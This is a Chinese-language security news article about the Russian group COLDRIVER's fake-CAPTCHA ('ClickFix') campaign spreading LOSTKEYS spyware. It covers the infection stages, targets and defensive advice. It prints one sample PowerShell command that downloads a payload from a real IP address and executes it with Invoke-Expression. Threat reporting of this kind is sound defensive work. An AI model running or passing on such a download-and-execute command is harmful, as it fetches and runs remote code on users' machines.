俄罗斯黑客借虚假CAPTCHA传播新型恶意软件LOSTKEYS,高价值目标面临数据窃取危机

admin 2025年5月9日15:28:48评论13 views字数 2138阅读7分7秒阅读模式

 俄罗斯黑客。

俄罗斯黑客借虚假CAPTCHA传播新型恶意软件LOSTKEYS,高价值目标面临数据窃取危机

俄罗斯黑客借虚假CAPTCHA传播新型恶意软件LOSTKEYS,高价值目标面临数据窃取危机

PS:有内网web自动化需求可以私信

01

导语

    近日,谷歌威胁情报组(GTIG)披露了一起由俄罗斯黑客组织COLDRIVER(又名Callisto、Star Blizzard)发起的网络攻击行动。该组织通过伪造的CAPTCHA验证页面(即“ClickFix”社会工程攻击手法),诱骗用户执行恶意代码,进而部署名为LOSTKEYS的新型间谍软件,窃取高价值目标的敏感数据。

俄罗斯黑客借虚假CAPTCHA传播新型恶意软件LOSTKEYS,高价值目标面临数据窃取危机

一.攻击手法解析:从虚假验证到数据窃取

  1. 第一步:诱骗用户执行恶意指令

    攻击始于一个伪装成技术修复页面的虚假网站,用户会被要求“验证身份”以通过CAPTCHA检查。实际上,页面会诱导用户复制一段PowerShell命令并粘贴到Windows系统的“运行”对话框中执行。

    powershell
    # 示例恶意命令(已简化)
    $c = New-Object System.Net.WebClient;  
    $c.DownloadString("http://165.227.148.68/payload") | Invoke-Expression  

    该命令会从远程服务器(IP:165.227.148.68)下载后续恶意载荷。

  2. 多阶段感染链

    • 第二阶段:下载的脚本会进行环境检测(如是否为虚拟机),以规避安全分析。

    • 第三阶段:通过Base64编码的PowerShell脚本解密并部署LOSTKEYS恶意软件。

  3. LOSTKEYS的核心功能

    • 窃取指定扩展名(如.docx、.pdf)的文件和系统信息;

    • 收集运行进程列表并回传至攻击者服务器;

    • 通过加密通道伪装合法HTTPS流量,躲避网络监控。

二.攻击目标与影响范围

  • 目标群体:西方政府前/现任顾问、军事人员、记者、智库、非政府组织(NGO)及与乌克兰相关的人员。

  • 攻击时间线:2025年1月、3月及4月均观察到活跃攻击,且最早可追溯至2023年12月的伪装样本。

  • 数据泄露后果:受害机构报告了知识产权盗窃敏感通信内容外泄,攻击者可能长期潜伏并持续窃取数据。

三.COLDRIVER组织的战术升级

    此前,COLDRIVER以钓鱼攻击窃取邮箱凭证为主,而LOSTKEYS的部署标志其转向定制化恶意软件攻击。该组织还曾开发另一款恶意软件SPICA,用于执行远程命令。其攻击模式与俄罗斯战略情报目标高度吻合,进一步强化了对其国家背景的研判。

四.防御建议:如何应对ClickFix攻击?

  1. 启用谷歌安全防护

    • 使用Chrome浏览器的增强安全浏览(Enhanced Safe Browsing)功能;

    • 高风险用户(如政府人员)可启用高级保护计划(Advanced Protection Program)

  2. 警惕社会工程陷阱

    • 勿轻信要求执行代码的“验证”页面,尤其是通过非官方渠道收到的链接;

    • 验证网站真实性,避免访问可疑域名。

  3. 加强终端防护

    • 定期更新系统及安全软件,阻断已知漏洞利用;

    • 监控异常进程及网络流量,尤其是对非常用IP的连接。

五.ClickFix攻击的蔓延趋势

ClickFix并非COLDRIVER专属工具,其作为一种跨平台社会工程框架,已被多个黑客组织采用。例如:

  • Lampion银行木马:通过钓鱼邮件分发含恶意HTML的ZIP文件,诱导用户执行ClickFix指令;

  • Atomic Stealer窃密软件:结合Binance智能链的EtherHiding技术隐藏恶意载荷;

  • Slavic Nation Empire团伙:伪造Google Meet页面传播StealC、AMOS Stealer等恶意软件。

结语

    LOSTKEYS的出现揭示了国家级黑客组织在攻击技术上的持续迭代。面对此类威胁,用户需提升安全意识,机构则应强化网络监控与威胁情报共享。谷歌等企业已通过安全浏览机制拦截恶意网站,但人为警惕仍是防御社会工程攻击的第一道防线

免责声明:

本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。

第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助

第十二条:  国家保护公民、法人和其他组织依法使用网络的权利,促进网络接入普及,提升网络服务水平,为社会提供安全、便利的网络服务,保障网络信息依法有序自由流动。

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,煽动颠覆国家政权、推翻社会主义制度,煽动分裂国家、破坏国家统一,宣扬恐怖主义、极端主义,宣扬民族仇恨、民族歧视,传播暴力、淫秽色情信息,编造、传播虚假信息扰乱经济秩序和社会秩序,以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。

第十三条:  国家支持研究开发有利于未成年人健康成长的网络产品和服务,依法惩治利用网络从事危害未成年人身心健康的活动,为未成年人提供安全、健康的网络环境。

原文始发于微信公众号(道玄网安驿站):俄罗斯黑客借虚假CAPTCHA传播新型恶意软件LOSTKEYS,高价值目标面临数据窃取危机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月9日15:28:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   俄罗斯黑客借虚假CAPTCHA传播新型恶意软件LOSTKEYS,高价值目标面临数据窃取危机https://cn-sec.com/archives/4045004.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息